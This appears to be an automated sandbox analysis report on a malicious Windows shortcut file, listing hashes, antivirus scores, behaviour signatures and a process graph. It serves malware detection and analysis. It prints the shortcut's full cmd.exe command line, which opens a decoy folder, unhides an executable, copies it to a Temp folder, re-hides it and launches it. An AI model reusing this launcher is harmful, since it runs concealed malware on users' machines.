Windows Analysis Report
shortcut.lnk

Overview

General Information

Sample Name: shortcut.lnk
Analysis ID: 795673
MD5: 00441beff42872f67c32a011c97caea2
SHA1: 595841cda4eb3b01bbaf3fe57569bc656b778067
SHA256: 0b1d60ba6baa76c075a7410c260a2b174c7e999e813b6a4d582c18592222601b
Tags: lnk
Infos:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Windows shortcut file (LNK) starts blacklisted processes
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Sample execution stops while process was sleeping (likely an evasion)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Creates a process in suspended mode (likely to inject code)
Searches for user specific document files

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: shortcut.lnk Avira: detected
Multi AV Scanner detection for submitted file
Source: shortcut.lnk ReversingLabs: Detection: 69%
Source: shortcut.lnk Virustotal: Detection: 72% Perma Link
Machine Learning detection for sample
Source: shortcut.lnk Joe Sandbox ML: detected
Source: shortcut.lnk ReversingLabs: Detection: 69%
Source: shortcut.lnk Virustotal: Detection: 72%
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: classification engine Classification label: mal72.winLNK@11/0@0/0
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\windows\system32\cmd.exe" /c "C:\Windows\explorer.exe %cd%.DataStorage & attrib -s -h %cd%dBuXlYk.exe & xcopy /F /S /Q /H /R /Y %cd%dBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ & attrib +s +h %cd%dBuXlYk.exe & start C:\Users\user\AppData\Local\Temp\zHyIh\dBuXlYk.exe & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\MsftEdit.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 351 Jump to behavior
Source: explorer.exe, 00000003.00000002.569217783.00000000061BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c "c:\windows\explorer.exe %cd%.datastorage & attrib -s -h %cd%dbuxlyk.exe & xcopy /f /s /q /h /r /y %cd%dbuxlyk.exe c:\users\user\appdata\local\temp\zhyih\ & attrib +s +h %cd%dbuxlyk.exe & start c:\users\user\appdata\local\temp\zhyih\dbuxlyk.exe & exit
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe C:\Users\user\Desktop.DataStorage Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -s -h C:\Users\user\DesktopdBuXlYk.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /F /S /Q /H /R /Y C:\Users\user\DesktopdBuXlYk.exe C:\Users\user\AppData\Local\Temp\zHyIh\ Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\DesktopdBuXlYk.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Searches for user specific document files
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 795673 Sample: shortcut.lnk Startdate: 01/02/2023 Architecture: WINDOWS Score: 72 19 Antivirus / Scanner detection for submitted sample 2->19 21 Windows shortcut file (LNK) starts blacklisted processes 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 Machine Learning detection for sample 2->25 6 cmd.exe 1 2 2->6         started        9 explorer.exe 10 13 2->9         started        process3 signatures4 27 Uses cmd line tools excessively to alter registry or file data 6->27 11 explorer.exe 1 6->11         started        13 conhost.exe 1 6->13         started        15 xcopy.exe 1 6->15         started        17 2 other processes 6->17 process5
No contacted IP infos